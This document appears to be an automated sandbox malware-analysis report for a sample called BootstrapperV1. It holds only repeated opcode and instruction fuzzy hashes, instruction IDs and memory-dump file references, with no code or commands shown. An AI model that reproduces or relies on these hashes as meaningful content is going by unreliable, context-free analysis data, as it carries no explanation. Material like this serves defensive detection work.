                                              • Instruction Fuzzy Hash: 06B10322F0EE4E0FF7B9D5AC54A937433C1EBA829171642B7E88DC72B5ED14AD064390
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 58b8d86445566b30875e8535844bebd6f6c567dba15d02ce76ea97e9bf6e7900
                                              • Instruction ID: 9929874737526fec032af3b6dd3ea427671517f6e511c090aa09cb79fd4b5ddb
                                              • Opcode Fuzzy Hash: 58b8d86445566b30875e8535844bebd6f6c567dba15d02ce76ea97e9bf6e7900
                                              • Instruction Fuzzy Hash: B0C1D471B0DA4C4FEB95EB7C84A96B97BE2EF5960074501BAD04DC72F3DD29AC428341
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fe37de93f01ebc03842022e304ea495f15cb6e30ab238b0d6f8c9126e35123aa
                                              • Instruction ID: fb6a6b1b85b19633c9dfd06c3d04d3ba732d43459778d8b795d97260ff7a0d40
                                              • Opcode Fuzzy Hash: fe37de93f01ebc03842022e304ea495f15cb6e30ab238b0d6f8c9126e35123aa
                                              • Instruction Fuzzy Hash: 9BC11722B0D7990FE354B77CA469AE53BE0EF86325F1945BBD0CDCA0A3DD14A849C391
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7ca663821a92dacb2ce14d2fba70ce9e0131314b867814eab6e5ce6ab63deb08
                                              • Instruction ID: 3d628a8300409ba04d1d5cc638b55a8216fcd7c2ffd518009c24f16109912f87
                                              • Opcode Fuzzy Hash: 7ca663821a92dacb2ce14d2fba70ce9e0131314b867814eab6e5ce6ab63deb08
                                              • Instruction Fuzzy Hash: 67C1E730B0DB4D4FDB64EF6888659B97BE1FF99700B0502BEE449C72B3DE24A9418781
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b59b97b6f3b042a585690f77df4fc4f4a9a256a7ec7b9783bd74cbc216bfef44
                                              • Instruction ID: 50c7827ed44fc3b4e0706226620bb1302a826c65af2f241d3d2408dc81c14143
                                              • Opcode Fuzzy Hash: b59b97b6f3b042a585690f77df4fc4f4a9a256a7ec7b9783bd74cbc216bfef44
                                              • Instruction Fuzzy Hash: 62C1E670A1DB4D4FE764EB2884696B5B7E2FFA4300F44457DE48DC32B6DE34A8028742
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ddbfc9ee58916be8e53042bc97f6b1c46d11bc45d672f777e2fb5afa3a81cea7
                                              • Instruction ID: befdc8722f5dbfb50f45de7edcb79a934ae819b52ba264492291fccc4734640e
                                              • Opcode Fuzzy Hash: ddbfc9ee58916be8e53042bc97f6b1c46d11bc45d672f777e2fb5afa3a81cea7
                                              • Instruction Fuzzy Hash: EDA1B03170EE0E4FEAF4EA9C94A4B6473D2EFA832471916BAD40DCB2B6D915ED418350
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e7dab02139a4a4840004db908d7320696cac782ab9d8cf656b30b756eaf33156
                                              • Instruction ID: fbba81edee7c497f3f3b3d4b3edbd3dbc7929e3768bb5b30321134a825c56ea6
                                              • Opcode Fuzzy Hash: e7dab02139a4a4840004db908d7320696cac782ab9d8cf656b30b756eaf33156
                                              • Instruction Fuzzy Hash: 3EA10823F0F65A4AF32577AC78698FDB760EF8027AB5903B7D1DD490F79C0426468291
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 67381129b6a906d9b7a6af7bc82b22027505d981c1feacce48534496c50790e3
                                              • Instruction ID: 730f844ddbe26498e07a6ef40bb76e8600ae8d3342b1e2f3a20052dcdd150e59
                                              • Opcode Fuzzy Hash: 67381129b6a906d9b7a6af7bc82b22027505d981c1feacce48534496c50790e3
                                              • Instruction Fuzzy Hash: 9DA10671B0DB4C4FEB68DA5CA8566B977E1EF99710F04027FE48AC32B1DA25F8418781
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0ec29fa5996bb0d7ac6703154bbcd8f6bec132249c6860917327f6032a0e8d1d
                                              • Instruction ID: 7c2d8455d0f893950a37828643468a59d74c78438e114c3177e026944c1e2a1a
                                              • Opcode Fuzzy Hash: 0ec29fa5996bb0d7ac6703154bbcd8f6bec132249c6860917327f6032a0e8d1d
                                              • Instruction Fuzzy Hash: FAA1CF30B19A494FEB94EF6884A4BB477D2EF68300B4541BAD84DCB2B7DD24ED45C790
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ac7bf4a3decdab557c4922603ac152bf59ac0f74c05f5c0d71b10d9121d06663
                                              • Instruction ID: bda851cb984ac12569f929f0908d44b61e285a9899459f7f8d517019ec641f48
                                              • Opcode Fuzzy Hash: ac7bf4a3decdab557c4922603ac152bf59ac0f74c05f5c0d71b10d9121d06663
                                              • Instruction Fuzzy Hash: 4A814952B0EE4E1FEBA8EA6C587967577C2EF98250B4402BED44DC32F7DD18AC424380
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 00b3bafd9f3e2098e621dbb92f1614c26c053b25a6c082f38091857d71989dc8
                                              • Instruction ID: 0d5782159d46c5bd9d8652ebd72f1f2a2315682fd22e19886b47a593bbe901ed
                                              • Opcode Fuzzy Hash: 00b3bafd9f3e2098e621dbb92f1614c26c053b25a6c082f38091857d71989dc8
                                              • Instruction Fuzzy Hash: D0913931A0EA8D4FDB95EF688465BB93BE1FF55310F0502BBE049C71B2CE289942C350
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9aed9d3b60f5b7adfeff4a5867cddf4d893affe7d768ffc66a852fd9c18342c7
                                              • Instruction ID: f92c3a8642d86bfeaee02dff05cff7dbd6c6df80d9f6d8a8969415f3ef1b175f
                                              • Opcode Fuzzy Hash: 9aed9d3b60f5b7adfeff4a5867cddf4d893affe7d768ffc66a852fd9c18342c7
                                              • Instruction Fuzzy Hash: 59A1E462E0E68D4FE754E7A898A5AECBBB1FF54714F0503BAE089D71E3DD1829028711
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2c112b93a4f67841f37239500a3c380ecb8ee6331ba9e55eafeb09cfe76a0f43
                                              • Instruction ID: 19341193a7d9b47cad651b5ca52096cf956e9a97f5b80198d8f3edd3a666aa61
                                              • Opcode Fuzzy Hash: 2c112b93a4f67841f37239500a3c380ecb8ee6331ba9e55eafeb09cfe76a0f43
                                              • Instruction Fuzzy Hash: 5BA10231B0EB4A4FE7699A68C46567577E1FF55310F1602BAD04AC72F2DE28ED428341
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cd2c9c1b8fdbb7461cb6bb7d0e7f607dfe511d19865e298faff102fbfd432c6a
                                              • Instruction ID: dbbc7a8b6657884c38c8bb231e3861fa38a85e78218d297e06c658bf3ded442c
                                              • Opcode Fuzzy Hash: cd2c9c1b8fdbb7461cb6bb7d0e7f607dfe511d19865e298faff102fbfd432c6a
                                              • Instruction Fuzzy Hash: D1B1D431A0EB8E4FEBA5EF6888746B977E1EF55300F1501BAD489C71F2DE29A941C701
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7d660c7798e6777e463e3a5a65f429ec8de093dc871cdf7293c6cdbaba989c4a
                                              • Instruction ID: efedebf4d0ffe142ebf20ff81762365212f34b521c4d4ba384ebc43c21249375
                                              • Opcode Fuzzy Hash: 7d660c7798e6777e463e3a5a65f429ec8de093dc871cdf7293c6cdbaba989c4a
                                              • Instruction Fuzzy Hash: 75A14631B0DB494FE765EB6C8465AB5B7E1EF85300F1405FED089C71A7DA29A882C381
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d40a3cba1530103071beffc30a775e8e29c9c3706e55113d7c3a08b2b6b2e2e9
                                              • Instruction ID: a2394ebc1a0ab45304edddda3eb8a2a6b84a699aff9898fef5d710d79b61dd26
                                              • Opcode Fuzzy Hash: d40a3cba1530103071beffc30a775e8e29c9c3706e55113d7c3a08b2b6b2e2e9
                                              • Instruction Fuzzy Hash: 37A1E731A0E78E4FEBA5EF6888756B97BE1EF55300F0501BAD489C71F2DD29A941C701
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4ac65c532a652324a0aa149e7801a7f28d54071160b1a6f1893d377d2d9cd93c
                                              • Instruction ID: 163f5d4a1218cff80c7807574c8b808588275fe44b6b8aded7ee829dcfd4f905
                                              • Opcode Fuzzy Hash: 4ac65c532a652324a0aa149e7801a7f28d54071160b1a6f1893d377d2d9cd93c
                                              • Instruction Fuzzy Hash: 0CA14271E1965D8FEBA8DBA8D8657AC77B1FF58301F0101BAD00DE32A6CE395981CB50
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a5ace427707359b566e0283a05a61ade9f108a76b9d6edaa5fa8b536e142a63a
                                              • Instruction ID: 02512c8a0a84493c285fe2156ef7ab44051e7b8d2054b5baa2fe346e35160b78
                                              • Opcode Fuzzy Hash: a5ace427707359b566e0283a05a61ade9f108a76b9d6edaa5fa8b536e142a63a
                                              • Instruction Fuzzy Hash: E691D27170CA4D4FDB98EB18C465ABA37E1EF99310B0405AEE48EC72A6DE25EC42C740
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 79173b88fd44cad9746047824e63717e2aeeca1e48ad17f4e4c14a972a5b86c1
                                              • Instruction ID: c70d6654369b2989ee5dfe83198fac9c771770169e20704c9d20ef147a761037
                                              • Opcode Fuzzy Hash: 79173b88fd44cad9746047824e63717e2aeeca1e48ad17f4e4c14a972a5b86c1
                                              • Instruction Fuzzy Hash: 46A17531B19A4E8FDF98EF58C8A5AB973A1FF58304F11017AD45EC32A6DE35A841C740
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d72145b7032a880a79ebbf1fbdca7a06fa4273f7af1e98a1bd789b997aa96be7
                                              • Instruction ID: 5f87900e034ddb438bf552c7c1912fe4bfb4a7b32e549e362b2790975a491fbf
                                              • Opcode Fuzzy Hash: d72145b7032a880a79ebbf1fbdca7a06fa4273f7af1e98a1bd789b997aa96be7
                                              • Instruction Fuzzy Hash: BB91C763E0FBC50FE365976C68B55F97BA0EF9122470903FBD0D88A0F7E8196A458351
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 09705fb3b55984563c85b53174c0f245a5241ff3a795742577eff0ac1659a401
                                              • Instruction ID: 28ce7d84e032684d6aa3542a290829de621d769755d07728c0e8fea9ec8b2858
                                              • Opcode Fuzzy Hash: 09705fb3b55984563c85b53174c0f245a5241ff3a795742577eff0ac1659a401
                                              • Instruction Fuzzy Hash: 91914862B0E6C91FE71697B8547A6A97FF0DF5A214F0901FAC0C9CB2B3C9196806C341
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d42e746f75b597798313509be0a7af00602dfb395aa3152952f834f346d87f51
                                              • Instruction ID: 7cef5c0a2aae4a54d0282145620470532da3bf10ed6839db3a93e9fa9ebb6a8d
                                              • Opcode Fuzzy Hash: d42e746f75b597798313509be0a7af00602dfb395aa3152952f834f346d87f51
                                              • Instruction Fuzzy Hash: 91814771A1DF8A4FE7A4E36844697B5B7E2FFA9340F44067DD089C31F2D928A9438741
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 332c52b49da9584f57913ae0e14997ba673f57e4f0b39f4642c4adfbdd326937
                                              • Instruction ID: 2fe9e61ccc2822de3b7f40cfa686a77ddff1fe560e2a726683f97ec4574fb50c
                                              • Opcode Fuzzy Hash: 332c52b49da9584f57913ae0e14997ba673f57e4f0b39f4642c4adfbdd326937
                                              • Instruction Fuzzy Hash: 89A16130A19B0A8EE735DF68C0A47B5B7E1BF54314F15467EC0DE872B2DA39B9828741
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5b77d181d4bc396d5765d669c617e2a22b27639a202d1aa448bad2e859a81723
                                              • Instruction ID: 33ea8b06b103f803f6c95829845008dfefbf6de87ed0e126e44c14fc93a03412
                                              • Opcode Fuzzy Hash: 5b77d181d4bc396d5765d669c617e2a22b27639a202d1aa448bad2e859a81723
                                              • Instruction Fuzzy Hash: F6712D30B19A4E8FDF94EF5CC495BBA37E1FF68341B050279E40AD76B1DA24E9418790
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 11360d7ad5a910d37de6994122f7f93ddc30ee68691f8b6c0106a9eed66ba753
                                              • Instruction ID: 17c987dc19b78d2b306412018cc77b54cd8ad35899efecec80f50b1be4ab3252
                                              • Opcode Fuzzy Hash: 11360d7ad5a910d37de6994122f7f93ddc30ee68691f8b6c0106a9eed66ba753
                                              • Instruction Fuzzy Hash: 3181D670A0EA8D4FEB55EBB844656A9BBF1EF5A300B4405FAD089D72B3CD296902C741
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b0327506e5206ea222980c7ec459360653e5c909bc6af368859050a8f1e22dce
                                              • Instruction ID: d899425e6ef748a2f0d31677f5e0c20d88f56dcea03c01c2c2be9082cffbec55
                                              • Opcode Fuzzy Hash: b0327506e5206ea222980c7ec459360653e5c909bc6af368859050a8f1e22dce
                                              • Instruction Fuzzy Hash: 46816170B09A4D8FDBA8EF58C465BA877E1FF59314F0602B9E44DD72A2CA34E941CB41
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c68e02c1e788c788c34053fa5dad72d9d31acdde489dd0af6163506e12671fe8
                                              • Instruction ID: a5eb81725d660abaa071c7ab3bbb6f16f28a7426a021de3bf6d84e260da4ad4c
                                              • Opcode Fuzzy Hash: c68e02c1e788c788c34053fa5dad72d9d31acdde489dd0af6163506e12671fe8
                                              • Instruction Fuzzy Hash: 5781A070B0A64D4FEB69EBA894617B97BF1EF46300F5401BED08ED76E2CE296941C701
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 400094daef50fdfa79506e67c9e17c320dd2e817dc88d9b261da896065807ee3
                                              • Instruction ID: ab74e1272f134758a51ddea65481aa6a7d59bb21dfcda8beea739d60e17051e7
                                              • Opcode Fuzzy Hash: 400094daef50fdfa79506e67c9e17c320dd2e817dc88d9b261da896065807ee3
                                              • Instruction Fuzzy Hash: 79613721B0EB4A1FE32997AC6866A797BD1EF45210F5502BFD089C72F3DD197E428381
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4d7f5b44037f699ad6d26ec93ad253e9bac930cdb32d3565e31ac792f84eca39
                                              • Instruction ID: ac82b7c1b563b098205315623582841b859a5b61ff079118c9233c58f17ed0a7
                                              • Opcode Fuzzy Hash: 4d7f5b44037f699ad6d26ec93ad253e9bac930cdb32d3565e31ac792f84eca39
                                              • Instruction Fuzzy Hash: B9719F30B19B0D4BEBA8EB6880656B6B3D1FF48314F51067ED48EC72A6DE39F9418740
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f1bca6691a3038fd2d7b37424ce74d7eb49caa0b95f32c5d45c1012018c31ea6
                                              • Instruction ID: 7cc3e77fb231f7a2a19505a63b0b52ee38eca11d08705f6b60f8e2b1f8cacd5c
                                              • Opcode Fuzzy Hash: f1bca6691a3038fd2d7b37424ce74d7eb49caa0b95f32c5d45c1012018c31ea6
                                              • Instruction Fuzzy Hash: CB616731B1DB4A4FD769DB6C8465A6277D0FF95310B15077ED09AC31A6EE34F9028381
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f5a9a407017925f0ec9b4ce25869390c98c03b3b1dfdcb2ba9c15f73e5c91c8c
                                              • Instruction ID: fbb4c2a2592ca3e2563980eb426146c1d0a7f6323a393807ed5ac8b236bf8521
                                              • Opcode Fuzzy Hash: f5a9a407017925f0ec9b4ce25869390c98c03b3b1dfdcb2ba9c15f73e5c91c8c
                                              • Instruction Fuzzy Hash: 0F711221B1EA890FE76AEBB894656F97BF1DF56300F0805FAD059C72F2CE19A8418341
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c7336530cc2d5102933d49e717860faa876e325a5c1b6ed13b5c607bb4c696ac
                                              • Instruction ID: 7902f2432e2b550ccbbcb1fc5e9b432403f88f4359bd18105ec538fbef754f6a
                                              • Opcode Fuzzy Hash: c7336530cc2d5102933d49e717860faa876e325a5c1b6ed13b5c607bb4c696ac
                                              • Instruction Fuzzy Hash: 96515723B1962D4AE724B7ACB459AFD37A0EF84335F0503B7E18CCA1E7DD0465468290
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5d9131d07d4fff1c969762a6747bb4070025dbb681cd0ceb4f62031663e1f8cb
                                              • Instruction ID: f6c4160bccc5ecb3c9bed85db99d469d202023dceddcbe1e2517ea72c9392fc2
                                              • Opcode Fuzzy Hash: 5d9131d07d4fff1c969762a6747bb4070025dbb681cd0ceb4f62031663e1f8cb
                                              • Instruction Fuzzy Hash: 0581F830A0DB4D4FDB58EB68C469AA87BE1FF19314F0602BDD44DD72B2CA24E941C741
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0b2d5ad18c3059e9e085d8311e5604d717b7ecc7e0d176cd47de7fb4c74c146e
                                              • Instruction ID: a8079845222430cf8ce5854adbe822c4e08a9c2d757af1de00fccb9b23f40da4
                                              • Opcode Fuzzy Hash: 0b2d5ad18c3059e9e085d8311e5604d717b7ecc7e0d176cd47de7fb4c74c146e
                                              • Instruction Fuzzy Hash: 74715031B19A4E8FEF98EF688865AB973A2FF58304F51017AD45EC31E2DE35A941C740
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a85abfe50a21e7d9552c71c857569181bdb782c847299fd34b90bb756b5bce63
                                              • Instruction ID: 34ad2b3e09498b0dd63b1f4e0565d086d11d4ef846a1e225fed3277ee8191ae0
                                              • Opcode Fuzzy Hash: a85abfe50a21e7d9552c71c857569181bdb782c847299fd34b90bb756b5bce63
                                              • Instruction Fuzzy Hash: D3613A20B1DB9D0FDBA5D76C84656B93BD1EF59710B0502BBE489CB2B7DD18A9018382
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 172bf1e487e8405b62e0fb6deda3c8febcbb38074546c5ceeea1f6e811d6ea5c
                                              • Instruction ID: 9b91fcab40bf9a111478f0f9b6d7e7349afe27f1f1cc949f371ad3163d75f6eb
                                              • Opcode Fuzzy Hash: 172bf1e487e8405b62e0fb6deda3c8febcbb38074546c5ceeea1f6e811d6ea5c
                                              • Instruction Fuzzy Hash: E3512131729B0A4FE7689B5CD884A7573E2FF98310B550779D44EC3272DA29F8838791
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
